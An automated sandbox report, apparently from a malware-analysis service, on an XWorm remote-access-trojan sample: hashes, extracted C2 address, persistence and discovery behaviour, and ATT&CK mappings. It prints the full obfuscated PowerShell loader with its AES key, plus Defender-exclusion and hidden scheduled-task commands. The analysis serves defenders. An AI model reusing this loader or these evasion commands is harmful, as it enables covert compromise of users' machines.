xworm | 7e412d3d7477ac6c9047d42bc2acbda8a2a28b0160d4ba7a6e7e916c640f07ae

Analysis

max time kernel
329s
max time network
326s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24/08/2024, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nutinme.exe
Size

274KB
MD5

d4203d29b2e6a217009d7c48406f6deb
SHA1

d65f0c2e2ab8a8b3a28d4ec6b91a7e8cd7168f67
SHA256

7e412d3d7477ac6c9047d42bc2acbda8a2a28b0160d4ba7a6e7e916c640f07ae
SHA512

eeb57f268eb44a2cb423410f3ce0c1466f9e16fd4d5490df4ec547cd2ca1c935f0325cf926c0d064b2854c985d19df3954de5ee14c0248d34d31a35fef559d04
SSDEEP

6144:TVoCgTOlxhtaiXhKKdJNzcgpL999eoBw1AjtrDWRTxe3xj8bO5dDtS:TUiLhBXhKsFjBz9e8trDITxOxj8bO0

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

147.185.221.22:13676

Mutex

9qW8SPljFCsv7jws

Attributes

Install_directory
%LocalAppData%
install_file
Windows Host Proccess.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1256-74-0x0000000006580000-0x0000000006592000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 7 IoCs

flow	pid	Process
34	1256	powershell.exe
36	1256	powershell.exe
46	1256	powershell.exe
58	1256	powershell.exe
75	1256	powershell.exe
76	1256	powershell.exe
81	1256	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4424	powershell.exe
960	powershell.exe
4452	powershell.exe
212	powershell.exe
3440	powershell.exe
5092	powershell.exe
1256	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	Nutinme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
624	Windows Host Proccess

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Proccess"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nutinme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Host Proccess
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2052	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
3440	powershell.exe
3440	powershell.exe
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
1256	powershell.exe
1256	powershell.exe
1256	powershell.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe
212	powershell.exe
212	powershell.exe
212	powershell.exe
4424	powershell.exe
4424	powershell.exe
4424	powershell.exe
1256	powershell.exe
624	Windows Host Proccess
624	Windows Host Proccess

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	5092	powershell.exe
Token: SeSecurityPrivilege	5092	powershell.exe
Token: SeTakeOwnershipPrivilege	5092	powershell.exe
Token: SeLoadDriverPrivilege	5092	powershell.exe
Token: SeSystemProfilePrivilege	5092	powershell.exe
Token: SeSystemtimePrivilege	5092	powershell.exe
Token: SeProfSingleProcessPrivilege	5092	powershell.exe
Token: SeIncBasePriorityPrivilege	5092	powershell.exe
Token: SeCreatePagefilePrivilege	5092	powershell.exe
Token: SeBackupPrivilege	5092	powershell.exe
Token: SeRestorePrivilege	5092	powershell.exe
Token: SeShutdownPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeSystemEnvironmentPrivilege	5092	powershell.exe
Token: SeRemoteShutdownPrivilege	5092	powershell.exe
Token: SeUndockPrivilege	5092	powershell.exe
Token: SeManageVolumePrivilege	5092	powershell.exe
Token: 33	5092	powershell.exe
Token: 34	5092	powershell.exe
Token: 35	5092	powershell.exe
Token: 36	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	5092	powershell.exe
Token: SeSecurityPrivilege	5092	powershell.exe
Token: SeTakeOwnershipPrivilege	5092	powershell.exe
Token: SeLoadDriverPrivilege	5092	powershell.exe
Token: SeSystemProfilePrivilege	5092	powershell.exe
Token: SeSystemtimePrivilege	5092	powershell.exe
Token: SeProfSingleProcessPrivilege	5092	powershell.exe
Token: SeIncBasePriorityPrivilege	5092	powershell.exe
Token: SeCreatePagefilePrivilege	5092	powershell.exe
Token: SeBackupPrivilege	5092	powershell.exe
Token: SeRestorePrivilege	5092	powershell.exe
Token: SeShutdownPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeSystemEnvironmentPrivilege	5092	powershell.exe
Token: SeRemoteShutdownPrivilege	5092	powershell.exe
Token: SeUndockPrivilege	5092	powershell.exe
Token: SeManageVolumePrivilege	5092	powershell.exe
Token: 33	5092	powershell.exe
Token: 34	5092	powershell.exe
Token: 35	5092	powershell.exe
Token: 36	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	5092	powershell.exe
Token: SeSecurityPrivilege	5092	powershell.exe
Token: SeTakeOwnershipPrivilege	5092	powershell.exe
Token: SeLoadDriverPrivilege	5092	powershell.exe
Token: SeSystemProfilePrivilege	5092	powershell.exe
Token: SeSystemtimePrivilege	5092	powershell.exe
Token: SeProfSingleProcessPrivilege	5092	powershell.exe
Token: SeIncBasePriorityPrivilege	5092	powershell.exe
Token: SeCreatePagefilePrivilege	5092	powershell.exe
Token: SeBackupPrivilege	5092	powershell.exe
Token: SeRestorePrivilege	5092	powershell.exe
Token: SeShutdownPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeSystemEnvironmentPrivilege	5092	powershell.exe
Token: SeRemoteShutdownPrivilege	5092	powershell.exe
Token: SeUndockPrivilege	5092	powershell.exe
Token: SeManageVolumePrivilege	5092	powershell.exe
Token: 33	5092	powershell.exe
Token: 34	5092	powershell.exe
Token: 35	5092	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1256	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 3160 wrote to memory of 3128	3160	Nutinme.exe	84
PID 3160 wrote to memory of 3128	3160	Nutinme.exe	84
PID 3160 wrote to memory of 3128	3160	Nutinme.exe	84
PID 3128 wrote to memory of 4828	3128	cmd.exe	86
PID 3128 wrote to memory of 4828	3128	cmd.exe	86
PID 3128 wrote to memory of 4828	3128	cmd.exe	86
PID 4828 wrote to memory of 2632	4828	net.exe	87
PID 4828 wrote to memory of 2632	4828	net.exe	87
PID 4828 wrote to memory of 2632	4828	net.exe	87
PID 3128 wrote to memory of 3440	3128	cmd.exe	91
PID 3128 wrote to memory of 3440	3128	cmd.exe	91
PID 3128 wrote to memory of 3440	3128	cmd.exe	91
PID 3440 wrote to memory of 5092	3440	powershell.exe	98
PID 3440 wrote to memory of 5092	3440	powershell.exe	98
PID 3440 wrote to memory of 5092	3440	powershell.exe	98
PID 3440 wrote to memory of 2312	3440	powershell.exe	102
PID 3440 wrote to memory of 2312	3440	powershell.exe	102
PID 3440 wrote to memory of 2312	3440	powershell.exe	102
PID 2312 wrote to memory of 4984	2312	WScript.exe	103
PID 2312 wrote to memory of 4984	2312	WScript.exe	103
PID 2312 wrote to memory of 4984	2312	WScript.exe	103
PID 4984 wrote to memory of 828	4984	cmd.exe	105
PID 4984 wrote to memory of 828	4984	cmd.exe	105
PID 4984 wrote to memory of 828	4984	cmd.exe	105
PID 828 wrote to memory of 1872	828	net.exe	106
PID 828 wrote to memory of 1872	828	net.exe	106
PID 828 wrote to memory of 1872	828	net.exe	106
PID 4984 wrote to memory of 1256	4984	cmd.exe	107
PID 4984 wrote to memory of 1256	4984	cmd.exe	107
PID 4984 wrote to memory of 1256	4984	cmd.exe	107
PID 1256 wrote to memory of 960	1256	powershell.exe	110
PID 1256 wrote to memory of 960	1256	powershell.exe	110
PID 1256 wrote to memory of 960	1256	powershell.exe	110
PID 1256 wrote to memory of 4452	1256	powershell.exe	112
PID 1256 wrote to memory of 4452	1256	powershell.exe	112
PID 1256 wrote to memory of 4452	1256	powershell.exe	112
PID 1256 wrote to memory of 212	1256	powershell.exe	114
PID 1256 wrote to memory of 212	1256	powershell.exe	114
PID 1256 wrote to memory of 212	1256	powershell.exe	114
PID 1256 wrote to memory of 4424	1256	powershell.exe	116
PID 1256 wrote to memory of 4424	1256	powershell.exe	116
PID 1256 wrote to memory of 4424	1256	powershell.exe	116
PID 1256 wrote to memory of 2052	1256	powershell.exe	118
PID 1256 wrote to memory of 2052	1256	powershell.exe	118
PID 1256 wrote to memory of 2052	1256	powershell.exe	118

C:\Users\Admin\AppData\Local\Temp\Nutinme.exe
"C:\Users\Admin\AppData\Local\Temp\Nutinme.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Nutinme.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\SysWOW64\net.exe
    net file
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      System Location Discovery: System Language Discovery
      PID:2632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNCwayIEKMX1wu1G6Nv1zAaGZ7BzZJSzSBMrPDlUebo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6PkW5gH2K764u40AVDSDA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $guWQG=New-Object System.IO.MemoryStream(,$param_var); $JgRlM=New-Object System.IO.MemoryStream; $jfych=New-Object System.IO.Compression.GZipStream($guWQG, [IO.Compression.CompressionMode]::Decompress); $jfych.CopyTo($JgRlM); $jfych.Dispose(); $guWQG.Dispose(); $JgRlM.Dispose(); $JgRlM.ToArray();}function execute_function($param_var,$param2_var){ $CpqWe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zuKbL=$CpqWe.EntryPoint; $zuKbL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Nutinme.bat';$oGCvp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Nutinme.bat').Split([Environment]::NewLine);foreach ($PoCbV in $oGCvp) { if ($PoCbV.StartsWith(':: ')) { $FqqAF=$PoCbV.Substring(3); break; }}$payloads_var=[string[]]$FqqAF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_572_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_572.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5092
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_572.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_572.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4984
      - C:\Windows\SysWOW64\net.exe
        
        net file
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:828
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNCwayIEKMX1wu1G6Nv1zAaGZ7BzZJSzSBMrPDlUebo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C6PkW5gH2K764u40AVDSDA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $guWQG=New-Object System.IO.MemoryStream(,$param_var); $JgRlM=New-Object System.IO.MemoryStream; $jfych=New-Object System.IO.Compression.GZipStream($guWQG, [IO.Compression.CompressionMode]::Decompress); $jfych.CopyTo($JgRlM); $jfych.Dispose(); $guWQG.Dispose(); $JgRlM.Dispose(); $JgRlM.ToArray();}function execute_function($param_var,$param2_var){ $CpqWe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zuKbL=$CpqWe.EntryPoint; $zuKbL.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_572.bat';$oGCvp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_572.bat').Split([Environment]::NewLine);foreach ($PoCbV in $oGCvp) { if ($PoCbV.StartsWith(':: ')) { $FqqAF=$PoCbV.Substring(3); break; }}$payloads_var=[string[]]$FqqAF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4424
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Local\Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2052

C:\Users\Admin\AppData\Local\Windows Host Proccess
"C:\Users\Admin\AppData\Local\Windows Host Proccess"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e4178a174422229ec9b0dcda7afeb6f2

SHA1
a90193ae95681eec73ae83773efb948d6f63a719

SHA256
962b9786fb86819034b3ed9ae19a6176c2b920e42e53ced2339dd0911e8d6742

SHA512
4b91a771f32be2e7150ee70106e8f52f73a0f3fc853f1a3ad4506f53e91be522b055cf119b5fabd8482162ed2eaa9d547ba51e9cdb8b14f1719eff350b2d5acf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a73a53aba175a45f1b57c229b7d6222b

SHA1
ceffa03e278e3ba3bc6906a89cdfe33c63b30a40

SHA256
12fcccb9cab0121cf746093c4943b862aae1324644d529d01450e8bbe18fa4c8

SHA512
6b8835faec28b195726bc38fd77c83023555b49029dcaa6a596d7dcda05a4200994507ac9bbdd7bbbb39ef62bc467ee8f30316cc3a4ad8ff4fde27f1d52e3b8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
790d17911e97ae2266923dbddcba7f34

SHA1
85956793029db769b7e6113eb225ab17b9c9b6d0

SHA256
f73428202be2f80fcab1aa34e43023dfd0d9117ca2715579f940a5ae610f137e

SHA512
bc15756e68bc97253e723875df474f34f7d4c9f06a6b9d958a63237d7007e46e022aa0fe69c3593d6724820c51abe06c27b8b965d43d038190c63778c460757e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f124ed323ba437bbc675c9b99289a407

SHA1
3784ad4ac7ea49399f37f6b09199bbd000ebbf26

SHA256
169ad76bb8f60b050c6223918c3a2bd97ee96493f98fc8ce872bd3a503ea4138

SHA512
026b1382105e0d870b7b13e6675504ddc32af28b38cfe75821c17d95aca7236f7d8fb74d27fa07bdc0e8278644c49ea681eb235a5c4c5917baaf5583f08b5d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nutinme.bat

Filesize
270KB

MD5
c89cd471198718a96c3adb9f7298a90e

SHA1
d26bef68f50311f75b44d13720b4b07f2e941084

SHA256
49249044131c0c4fea5fcb837d764aaf8997f05105678af296d1a470b91fc640

SHA512
5720b046af3f9ab5158a4d5c43f9683781b33abcd7ef0415cf21fd8b187744f568651b72f9aaf37ee42c3e276b636488e030f1553a60efd1917b2d68153363bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdavpdb2.gcw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Windows Host Proccess

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_572.vbs

Filesize
115B

MD5
63d69f9a7495097626449c09d3d2b8bf

SHA1
110f53df91d19dc14c31f43c3194391d7b63f7b5

SHA256
a9b7c6c99de10c37f0d8d41e2363381558093c9928119188117c22ea15434c6f

SHA512
89f476a91bcb384ef39e5992bdb2494694d99a5caeaf82589e191e43062387ce6ecd1522dd42371a576a325adcb69f8508db9e8d5c69c5febbe47a9f39db7a92

Download Submit
memory/212-134-0x0000000070B50000-0x0000000070B9C000-memory.dmp

Filesize
304KB

Download
memory/960-101-0x0000000007C70000-0x0000000007C78000-memory.dmp

Filesize
32KB

Download
memory/960-100-0x0000000007C80000-0x0000000007C9A000-memory.dmp

Filesize
104KB

Download
memory/960-99-0x0000000007C40000-0x0000000007C54000-memory.dmp

Filesize
80KB

Download
memory/960-98-0x0000000007C30000-0x0000000007C3E000-memory.dmp

Filesize
56KB

Download
memory/960-97-0x0000000007C00000-0x0000000007C11000-memory.dmp

Filesize
68KB

Download
memory/960-96-0x00000000078E0000-0x0000000007983000-memory.dmp

Filesize
652KB

Download
memory/960-86-0x0000000070B50000-0x0000000070B9C000-memory.dmp

Filesize
304KB

Download
memory/1256-169-0x0000000008E90000-0x0000000008F22000-memory.dmp

Filesize
584KB

Download
memory/1256-75-0x0000000007B90000-0x0000000007C2C000-memory.dmp

Filesize
624KB

Download
memory/1256-74-0x0000000006580000-0x0000000006592000-memory.dmp

Filesize
72KB

Download
memory/1256-170-0x00000000090E0000-0x00000000090EA000-memory.dmp

Filesize
40KB

Download
memory/1256-172-0x0000000008040000-0x000000000804C000-memory.dmp

Filesize
48KB

Download
memory/3440-22-0x0000000006A20000-0x0000000006A6C000-memory.dmp

Filesize
304KB

Download
memory/3440-23-0x0000000008220000-0x000000000889A000-memory.dmp

Filesize
6.5MB

Download
memory/3440-4-0x0000000074D3E000-0x0000000074D3F000-memory.dmp

Filesize
4KB

Download
memory/3440-5-0x00000000034F0000-0x0000000003526000-memory.dmp

Filesize
216KB

Download
memory/3440-7-0x0000000005DE0000-0x0000000006408000-memory.dmp

Filesize
6.2MB

Download
memory/3440-6-0x0000000074D30000-0x00000000754E0000-memory.dmp

Filesize
7.7MB

Download
memory/3440-8-0x0000000005B10000-0x0000000005B32000-memory.dmp

Filesize
136KB

Download
memory/3440-76-0x0000000074D30000-0x00000000754E0000-memory.dmp

Filesize
7.7MB

Download
memory/3440-10-0x0000000006480000-0x00000000064E6000-memory.dmp

Filesize
408KB

Download
memory/3440-27-0x00000000088A0000-0x0000000008E44000-memory.dmp

Filesize
5.6MB

Download
memory/3440-26-0x0000000007BF0000-0x0000000007C24000-memory.dmp

Filesize
208KB

Download
memory/3440-25-0x0000000006FE0000-0x0000000006FE8000-memory.dmp

Filesize
32KB

Download
memory/3440-24-0x0000000006FA0000-0x0000000006FBA000-memory.dmp

Filesize
104KB

Download
memory/3440-9-0x0000000006410000-0x0000000006476000-memory.dmp

Filesize
408KB

Download
memory/3440-21-0x00000000069F0000-0x0000000006A0E000-memory.dmp

Filesize
120KB

Download
memory/3440-20-0x00000000064F0000-0x0000000006844000-memory.dmp

Filesize
3.3MB

Download
memory/4424-155-0x0000000070B50000-0x0000000070B9C000-memory.dmp

Filesize
304KB

Download
memory/4452-113-0x0000000070B50000-0x0000000070B9C000-memory.dmp

Filesize
304KB

Download
memory/5092-53-0x0000000007EC0000-0x0000000007ED1000-memory.dmp

Filesize
68KB

Download
